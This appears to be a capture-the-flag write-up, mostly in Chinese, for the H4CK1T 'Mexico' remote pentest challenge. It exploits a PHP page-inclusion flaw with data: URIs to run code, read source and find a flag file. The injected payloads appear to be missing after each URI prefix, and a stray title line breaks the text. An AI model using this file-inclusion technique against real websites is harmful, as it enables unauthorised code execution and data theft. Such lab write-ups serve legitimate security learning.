Press "Enter" to skip to content

[H4CK1T]Mexico – Remote pentest – 150pts

Description:

EN:
Our foreign partners have some problems with qualified staffin the field of information technology, we decided to help them andto conduct remote testing of their new website. Your task is tofind a hole in the system and grab some information to confirm thehack .Good luck !
http://91.231.84.36:9150/
h4ck1t{}
Solution:
連接上網頁後 , 發現index.php中有3個連結 , 分別是
index.php?page=about
index.php?page=services
index.php?page=contact
這個設計是將page中的value放進一個parameter 再進行include page
所以我們可以嘗試
http://91.231.84.36:9150/index.php?page=data:text/plaintext,
果然有代碼執行的漏洞 , 所以可以開始任意玩弄了
我的第一步是取得網頁的原始碼
http://91.231.84.36:9150/index.php?page=data:text/plaintext,
得到

{H4ck1t}[Web]capture_Mexico - Remote pentest - 150pts

算法跟一開始想的差不多 , 但是仍然沒有flag
那試試列出目錄下所有檔案好了
http://91.231.84.36:9150/index.php?page=data:text/plaintext,

所以得出flag
http://91.231.84.36:9150/sup3r_$3cr3t_f1le.php
 

Comments